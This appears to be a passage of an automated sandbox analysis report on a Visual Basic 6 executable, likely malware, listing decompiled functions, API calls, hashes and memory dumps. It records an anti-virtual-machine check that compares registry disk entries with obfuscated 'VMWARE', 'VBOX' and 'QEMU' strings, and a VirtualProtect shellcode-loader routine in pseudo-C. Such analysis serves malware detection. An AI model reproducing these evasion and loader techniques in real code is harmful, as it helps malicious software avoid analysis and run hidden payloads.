                                                                                                                                                        • Opcode ID: 4007ad0c112d9665089efe4a98afc33cc32bddf87f161cba98b9d23f7b376f3d
                                                                                                                                                        • Instruction ID: 6c0a2203cafa804e6aa4f3d396c959ce73f7923511b47282cf6cda23ebe23c76
                                                                                                                                                        • Opcode Fuzzy Hash: 4007ad0c112d9665089efe4a98afc33cc32bddf87f161cba98b9d23f7b376f3d
                                                                                                                                                        • Instruction Fuzzy Hash: 97B00135266A81CFC2A6CB0AC594F6073B8FB04A42F4654F0E50A8BE62C338A900DA40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 02210BD6, Relevance: .0, Instructions: 3COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.361003660.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8e6c2477ed0c4efe4114f4677e2c62389309023dfec06ca76cc1c07a2230d211
                                                                                                                                                        • Instruction ID: 31f6f66f674c6c0db6d4a61f3e76db3164098447d915f33acc90d007a0f527d1
                                                                                                                                                        • Opcode Fuzzy Hash: 8e6c2477ed0c4efe4114f4677e2c62389309023dfec06ca76cc1c07a2230d211
                                                                                                                                                        • Instruction Fuzzy Hash: ADB00135266981CFD296CB0AC594F5173B8FB04A42F4614F0E4059BA62C738A940CB00
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00428A60, Relevance: 66.7, APIs: 33, Strings: 5, Instructions: 211registryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00428560: __vbaStrCopy.MSVBVM60(660E6C30,00000000,660DDE99), ref: 004285A0
                                                                                                                                                          • Part of subcall function 00428560: #653.MSVBVM60(?,?), ref: 004285BB
                                                                                                                                                          • Part of subcall function 00428560: __vbaI4Var.MSVBVM60(?), ref: 004285C5
                                                                                                                                                          • Part of subcall function 00428560: __vbaFreeVar.MSVBVM60 ref: 004285DB
                                                                                                                                                          • Part of subcall function 00428560: __vbaStrMove.MSVBVM60(?,?,00000001,?), ref: 00428601
                                                                                                                                                          • Part of subcall function 00428560: __vbaStrCat.MSVBVM60(00000000), ref: 00428604
                                                                                                                                                          • Part of subcall function 00428560: __vbaStrMove.MSVBVM60 ref: 0042860F
                                                                                                                                                          • Part of subcall function 00428560: __vbaFreeStr.MSVBVM60 ref: 00428614
                                                                                                                                                          • Part of subcall function 00428560: __vbaFreeStr.MSVBVM60(00428651), ref: 0042864A
                                                                                                                                                        • __vbaStrMove.MSVBVM60(S*Y*S*T*E*M*\*C*o*n*t*r*o*l*S*e*t*0*0*1*\*S*e*r*v*i*c*e*s*\*D*i*s*k*\*E*n*u*m*,66106AEE,00000000,660DC30A), ref: 00428ABB
                                                                                                                                                        • #644.MSVBVM60(00000000), ref: 00428ABE
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,?), ref: 00428AD7
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00428AEF
                                                                                                                                                        • #526.MSVBVM60(?,000000FF), ref: 00428B03
                                                                                                                                                        • __vbaStrVarMove.MSVBVM60(?), ref: 00428B0D
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 00428B18
                                                                                                                                                        • __vbaStrCopy.MSVBVM60 ref: 00428B22
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00428B2B
                                                                                                                                                        • __vbaFreeVar.MSVBVM60 ref: 00428B30
                                                                                                                                                        • #644.MSVBVM60(004026B8), ref: 00428B3B
                                                                                                                                                        • #644.MSVBVM60 ref: 00428B4C
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00428B76
                                                                                                                                                        • #617.MSVBVM60(?,?,000000FE), ref: 00428BA9
                                                                                                                                                        • #528.MSVBVM60(?,?), ref: 00428BB7
                                                                                                                                                        • __vbaStrVarMove.MSVBVM60(?), ref: 00428BC1
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 00428BCC
                                                                                                                                                        • __vbaStrCopy.MSVBVM60 ref: 00428BD6
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00428BDF
                                                                                                                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00428BEB
                                                                                                                                                        • __vbaStrMove.MSVBVM60(*+V+I+R+T+U+A+L+*+), ref: 00428C0B
                                                                                                                                                        • __vbaStrCmp.MSVBVM60(00000000), ref: 00428C0E
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00428C20
                                                                                                                                                        • __vbaStrMove.MSVBVM60(*<V<M<W<A<R<E<*<,00000000), ref: 00428C46
                                                                                                                                                        • __vbaStrCmp.MSVBVM60(00000000), ref: 00428C49
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00428C5B
                                                                                                                                                        • __vbaStrMove.MSVBVM60(*$V$B$O$X$*$), ref: 00428C81
                                                                                                                                                        • __vbaStrCmp.MSVBVM60(00000000), ref: 00428C84
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00428C96
                                                                                                                                                        • __vbaStrMove.MSVBVM60(*?Q?E?M?U?*?), ref: 00428CBB
                                                                                                                                                        • __vbaStrCmp.MSVBVM60(00000000), ref: 00428CBE
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00428CD0
                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00428CE2
                                                                                                                                                        Strings
                                                                                                                                                        • *<V<M<W<A<R<E<*<, xrefs: 00428C37
                                                                                                                                                        • S*Y*S*T*E*M*\*C*o*n*t*r*o*l*S*e*t*0*0*1*\*S*e*r*v*i*c*e*s*\*D*i*s*k*\*E*n*u*m*, xrefs: 00428A8B
                                                                                                                                                        • *?Q?E?M?U?*?, xrefs: 00428CAC
                                                                                                                                                        • *+V+I+R+T+U+A+L+*+, xrefs: 00428BFC
                                                                                                                                                        • *$V$B$O$X$*$, xrefs: 00428C72
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Free$Move$#644Copy$#526#528#617#653CloseListOpenQueryValue
                                                                                                                                                        • String ID: *$V$B$O$X$*$$*+V+I+R+T+U+A+L+*+$*<V<M<W<A<R<E<*<$*?Q?E?M?U?*?$S*Y*S*T*E*M*\*C*o*n*t*r*o*l*S*e*t*0*0*1*\*S*e*r*v*i*c*e*s*\*D*i*s*k*\*E*n*u*m*
                                                                                                                                                        • API String ID: 3472048080-959839144
                                                                                                                                                        • Opcode ID: ae436fa323c42ffa3b93078b23f168a2114a2db2c89db04a86f23939d36a9d2f
                                                                                                                                                        • Instruction ID: ec6d6e0e41a6dfc0922307876cf84913033ddbfb6f7658b4d1e0ec35aa047412
                                                                                                                                                        • Opcode Fuzzy Hash: ae436fa323c42ffa3b93078b23f168a2114a2db2c89db04a86f23939d36a9d2f
                                                                                                                                                        • Instruction Fuzzy Hash: 2871507190022ADFCB14DFA4DC499FE7779FF99700F11421AE402A7294DF785909DBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004255D0, Relevance: 31.6, APIs: 21, Instructions: 150COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaStrCopy.MSVBVM60 ref: 0042561C
                                                                                                                                                        • __vbaVarDup.MSVBVM60 ref: 00425636
                                                                                                                                                        • #607.MSVBVM60(?,00000104,?), ref: 00425649
                                                                                                                                                        • __vbaStrVarMove.MSVBVM60(?), ref: 00425653
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 0042565E
                                                                                                                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042566E
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000002,00000000), ref: 00425685
                                                                                                                                                        • #644.MSVBVM60(?), ref: 00425698
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 004256BD
                                                                                                                                                        • #644.MSVBVM60(?), ref: 004256C3
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 004256F0
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 00425714
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?), ref: 0042573C
                                                                                                                                                        • #617.MSVBVM60(?,00000003,00000000), ref: 0042575C
                                                                                                                                                        • __vbaStrVarMove.MSVBVM60(?), ref: 00425766
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 00425771
                                                                                                                                                        • __vbaFreeVar.MSVBVM60 ref: 0042577A
                                                                                                                                                        • __vbaStrCopy.MSVBVM60 ref: 00425787
                                                                                                                                                        • __vbaStrCopy.MSVBVM60 ref: 00425793
                                                                                                                                                        • __vbaFreeStr.MSVBVM60(004257E0), ref: 004257D8
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 004257DD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Move$Free$Copy$#644$#607#617EraseListRedim
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2391472805-0
                                                                                                                                                        • Opcode ID: 2d0d4ee90c188f78093e5886dbc8b6434816ca56edf298636bbad5c0d37dbaef
                                                                                                                                                        • Instruction ID: dc7addd3e47f2adf20b06c75e9dbb1fad6a2cc1ad176be0bd80086783f3320ae
                                                                                                                                                        • Opcode Fuzzy Hash: 2d0d4ee90c188f78093e5886dbc8b6434816ca56edf298636bbad5c0d37dbaef
                                                                                                                                                        • Instruction Fuzzy Hash: 53515DB0D00219DFDB04DFE8D988AEDBBB5FF58700F11811AE106A7254DB74AA4ADF50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004274C0, Relevance: 22.6, APIs: 15, Instructions: 142COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • #648.MSVBVM60(?), ref: 00427521
                                                                                                                                                        • __vbaFreeVar.MSVBVM60 ref: 0042752D
                                                                                                                                                        • __vbaStrCmp.MSVBVM60(004031F0,00000000), ref: 00427544
                                                                                                                                                        • #645.MSVBVM60(?,00000000), ref: 00427561
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 0042756C
                                                                                                                                                        • __vbaStrCmp.MSVBVM60(004031F0,00000000), ref: 00427578
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00427586
                                                                                                                                                        • __vbaFreeStr.MSVBVM60(0042769B), ref: 00427694
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Free$#645#648Move
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2957232524-0
                                                                                                                                                        • Opcode ID: 7228f6d6e774b9316d99653e4d6fb7b231186f6c128630b2b14e20e409e1e282
                                                                                                                                                        • Instruction ID: 7d7084d4c4c1025012f41c0fd411760af9e7b5d86daed0af04be09d1eaa4a16f
                                                                                                                                                        • Opcode Fuzzy Hash: 7228f6d6e774b9316d99653e4d6fb7b231186f6c128630b2b14e20e409e1e282
                                                                                                                                                        • Instruction Fuzzy Hash: FF513CB0D01209EFCB00CF95D988AEEBBB8FF59714F60411AE509A7250DB345A0ADF94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00427230, Relevance: 18.1, APIs: 12, Instructions: 107COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaObjSetAddref.MSVBVM60(?,00598248,660DA008,00401006,660D9FAF), ref: 0042727B
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 004272A6
                                                                                                                                                        • __vbaVarDup.MSVBVM60 ref: 004272D6
                                                                                                                                                        • #607.MSVBVM60(?,?,?), ref: 004272E8
                                                                                                                                                        • __vbaStrVarMove.MSVBVM60(?), ref: 004272F2
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 004272FD
                                                                                                                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0042730D
                                                                                                                                                        • #644.MSVBVM60(?), ref: 0042731A
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 00427346
                                                                                                                                                        • __vbaStrCopy.MSVBVM60 ref: 00427352
                                                                                                                                                        • __vbaFreeObj.MSVBVM60(00427395), ref: 00427385
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 0042738E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Free$CheckHresultMove$#607#644AddrefCopyList
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 315378923-0
                                                                                                                                                        • Opcode ID: ee48134f2191177975cac93fa97fdbfe300519fb95960efe1bb248c8b7e1a7b0
                                                                                                                                                        • Instruction ID: 3b7bb44dc28384d91571e11318f808714ef909721d8b305f0b21c7692e83a1e6
                                                                                                                                                        • Opcode Fuzzy Hash: ee48134f2191177975cac93fa97fdbfe300519fb95960efe1bb248c8b7e1a7b0
                                                                                                                                                        • Instruction Fuzzy Hash: BF410AB1D0021AEFCF00DF94D989EEEBB79FB59704F10450AF501A7290DB78690ADBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004288F0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 112memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                                        			E004288F0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				long _v28;
				long _v32;
				char _v36;
				char _v40;
				long _v48;
				long _v56;
				long _v60;
				intOrPtr _t48;
				void* _t51;
				long _t54;
				char* _t60;
				intOrPtr* _t83;
				void* _t88;
				void* _t90;
				intOrPtr _t91;

				_t91 = _t90 - 8;
				 *[fs:0x0] = _t91;
				_v12 = _t91 - 0x2c;
				_v8 = 0x598300;
				_t83 = __imp____vbaRedim;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v56 = 0;
				_v60 = 0;
				 *_t83(0x80, 1,  &_v24, 0x11, 1, 0x3f, 0, __edi, __esi, __ebx,  *[fs:0x0], 0x401006, _t88);
				 *_t83(0x880, 0x10,  &_v40, 0, 1, 0, 0);
				_v48 = 0;
				_v56 = 3;
				__imp____vbaVarMove();
				_t48 =  *0x5991f4; // 0x0
				_v60 = L00425117( *((intOrPtr*)( *((intOrPtr*)(_t48 + 0xc)) + (0xd -  *((intOrPtr*)(_t48 + 0x14))) * 4)),  *((intOrPtr*)( *((intOrPtr*)(_t48 + 0xc)) + (0xd -  *((intOrPtr*)(_t48 + 0x14))) * 4)),  &_v40);
				__imp____vbaErase(0,  &_v40);
				_t51 = _v60;
				_v28 = _t51;
				VirtualProtect(_t51, 0x40, 0x40,  &_v32);
				__imp____vbaAryLock( &_v36, _v24);
				_t54 = _v36;
				__imp__#644( *((intOrPtr*)(_t54 + 0xc)) -  *((intOrPtr*)(_t54 + 0x14)));
				_v60 = _t54;
				__imp____vbaAryUnlock( &_v36);
				E004253EA(_v28, _v60, 0x40);
				_v60 = 0x40;
				E004288C0( &_v28,  &_v60,  &_v32,  &_v32);
				_t60 =  &_v24;
				__imp____vbaAryDestruct(0, _t60, E00428A47);
				return _t60;
			}





















                                                                                                                                                        0x004288f3
                                                                                                                                                        0x00428902
                                                                                                                                                        0x0042890f
                                                                                                                                                        0x00428912
                                                                                                                                                        0x0042891b
                                                                                                                                                        0x00428933
                                                                                                                                                        0x00428936
                                                                                                                                                        0x00428939
                                                                                                                                                        0x0042893c
                                                                                                                                                        0x0042893f
                                                                                                                                                        0x00428942
                                                                                                                                                        0x00428945
                                                                                                                                                        0x00428948
                                                                                                                                                        0x0042895a
                                                                                                                                                        0x0042895f
                                                                                                                                                        0x00428962
                                                                                                                                                        0x0042897c
                                                                                                                                                        0x00428982
                                                                                                                                                        0x004289a4
                                                                                                                                                        0x004289a9
                                                                                                                                                        0x004289af
                                                                                                                                                        0x004289bb
                                                                                                                                                        0x004289be
                                                                                                                                                        0x004289cc
                                                                                                                                                        0x004289d2
                                                                                                                                                        0x004289de
                                                                                                                                                        0x004289e4
                                                                                                                                                        0x004289eb
                                                                                                                                                        0x004289fb
                                                                                                                                                        0x00428a10
                                                                                                                                                        0x00428a17
                                                                                                                                                        0x00428a3a
                                                                                                                                                        0x00428a40
                                                                                                                                                        0x00428a46

                                                                                                                                                        APIs
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,0000003F,00000000,66106AEE,00000000,660DC30A), ref: 00428948
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 0042895A
                                                                                                                                                        • __vbaVarMove.MSVBVM60 ref: 0042897C
                                                                                                                                                        • __vbaErase.MSVBVM60(00000000,?), ref: 004289A9
                                                                                                                                                        • VirtualProtect.KERNEL32(?,00000040,00000040,?), ref: 004289BE
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 004289CC
                                                                                                                                                        • #644.MSVBVM60(00401006), ref: 004289DE
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 004289EB
                                                                                                                                                          • Part of subcall function 004288C0: VirtualProtect.KERNEL32(?,?,?,?,00428A1C,?,?,?,?,?,?,00000040), ref: 004288DA
                                                                                                                                                        • __vbaAryDestruct.MSVBVM60(00000000,?,00428A47,?,?,?,?,?,?,00000040), ref: 00428A40
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$ProtectRedimVirtual$#644DestructEraseLockMoveUnlock
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 3563997547-2766056989
                                                                                                                                                        • Opcode ID: 9838a694454887f841f7dcac1de810644a2786653096c5e2ee26b320d36eac73
                                                                                                                                                        • Instruction ID: 88c1dc00278f2acd75e6fe59c606cb7e49cb616f97ac8ed1e2714dfab42ce4e2
                                                                                                                                                        • Opcode Fuzzy Hash: 9838a694454887f841f7dcac1de810644a2786653096c5e2ee26b320d36eac73
                                                                                                                                                        • Instruction Fuzzy Hash: F24100B1900219AFDB04DF95D989FEEBBB9FF48700F11410AF605B7250DBB4A905CBA5
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00427960, Relevance: 15.1, APIs: 10, Instructions: 107COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaNew2.MSVBVM60(004031DC,005982E4), ref: 004279B6
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004031CC,00000024), ref: 004279D7
                                                                                                                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004279F6
                                                                                                                                                        • __vbaNew2.MSVBVM60(004031DC,005982E4), ref: 00427A0A
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,004031CC,0000001C), ref: 00427A3C
                                                                                                                                                        • __vbaStrVarVal.MSVBVM60(?,?), ref: 00427A4C
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00402C1C,00000054), ref: 00427A66
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00427A6F
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 00427A78
                                                                                                                                                        • __vbaFreeVar.MSVBVM60 ref: 00427A81
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$CheckFreeHresult$New2
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4034668929-0
                                                                                                                                                        • Opcode ID: 7e6343c6b9875f326f3a9d2d950cb8a5211d4a0d1f83c7394d5ad646105b651e
                                                                                                                                                        • Instruction ID: d4c2409e6720f63e44207fd70f455f8e3559934cdc4c64bcec603789be0effe2
                                                                                                                                                        • Opcode Fuzzy Hash: 7e6343c6b9875f326f3a9d2d950cb8a5211d4a0d1f83c7394d5ad646105b651e
                                                                                                                                                        • Instruction Fuzzy Hash: 1A411C70A00215AFDB109F65DC49EAEBFBCFF56705B10841AF501E72A1DB78994ACB60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004270E0, Relevance: 13.6, APIs: 9, Instructions: 104COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaObjSetAddref.MSVBVM60(?,00598238,660DA008,00401006,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 00427125
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C,?,?,?,?,?,?,?,00000000,00401006), ref: 00427155
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,?,?,?,?,?,?,?,00000000,00401006), ref: 0042717B
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 0042718C
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004025F8,0000000C), ref: 004271C1
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004271CB
                                                                                                                                                        • __vbaAryCopy.MSVBVM60(?,?), ref: 004271D9
                                                                                                                                                        • __vbaFreeObj.MSVBVM60(00427219,?,?,?,?,?,?,?,00000000,00401006), ref: 00427206
                                                                                                                                                        • __vbaAryDestruct.MSVBVM60(00000000,?,?,?,?,?,?,?,?,00000000,00401006), ref: 00427212
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$CheckHresult$AddrefCopyDestructFreeLockRedimUnlock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4132618860-0
                                                                                                                                                        • Opcode ID: f91a9f652b4271384e17e4a8f97ca8bc64cb787fe70f5db823ca26d246876acd
                                                                                                                                                        • Instruction ID: 16ceb88be1c655ecde750765a8b799b27461745e66417f2f5d5cc0e492acefb6
                                                                                                                                                        • Opcode Fuzzy Hash: f91a9f652b4271384e17e4a8f97ca8bc64cb787fe70f5db823ca26d246876acd
                                                                                                                                                        • Instruction Fuzzy Hash: 55311DB0E00219AFDB04DB94DD89EFEBBB8FB58B04F10810AF501A7290DA749945DBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00428560, Relevance: 13.6, APIs: 9, Instructions: 65COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaStrCopy.MSVBVM60(660E6C30,00000000,660DDE99), ref: 004285A0
                                                                                                                                                        • #653.MSVBVM60(?,?), ref: 004285BB
                                                                                                                                                        • __vbaI4Var.MSVBVM60(?), ref: 004285C5
                                                                                                                                                        • __vbaFreeVar.MSVBVM60 ref: 004285DB
                                                                                                                                                        • __vbaFreeStr.MSVBVM60(00428651), ref: 0042864A
                                                                                                                                                          • Part of subcall function 00428670: __vbaStrCopy.MSVBVM60(660E6C30,?,00000002), ref: 004286B0
                                                                                                                                                          • Part of subcall function 00428670: #632.MSVBVM60(?,?,?,?), ref: 004286E0
                                                                                                                                                          • Part of subcall function 00428670: __vbaStrVarMove.MSVBVM60(?), ref: 004286EA
                                                                                                                                                          • Part of subcall function 00428670: __vbaStrMove.MSVBVM60 ref: 004286F5
                                                                                                                                                          • Part of subcall function 00428670: __vbaFreeVar.MSVBVM60 ref: 004286FE
                                                                                                                                                          • Part of subcall function 00428670: __vbaFreeStr.MSVBVM60(0042872E), ref: 00428727
                                                                                                                                                        • __vbaStrMove.MSVBVM60(?,?,00000001,?), ref: 00428601
                                                                                                                                                        • __vbaStrCat.MSVBVM60(00000000), ref: 00428604
                                                                                                                                                        • __vbaStrMove.MSVBVM60 ref: 0042860F
                                                                                                                                                        • __vbaFreeStr.MSVBVM60 ref: 00428614
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$Free$Move$Copy$#632#653
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2241139991-0
                                                                                                                                                        • Opcode ID: 743a1ccc576196550fe2d8b1fa63cb80b1621bcea2792cf1c27f2f375eac99fe
                                                                                                                                                        • Instruction ID: f80fa9ffd90d3ede6b76b937fa13ea87ea2e47c452e558eca498cc94f24650af
                                                                                                                                                        • Opcode Fuzzy Hash: 743a1ccc576196550fe2d8b1fa63cb80b1621bcea2792cf1c27f2f375eac99fe
                                                                                                                                                        • Instruction Fuzzy Hash: 59210E71D012199FCF10DFA4D949AEEBBB5FB59300F11411AE405B3250EB78690ADF51
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042541A, Relevance: 12.1, APIs: 8, Instructions: 126fileCOMMON
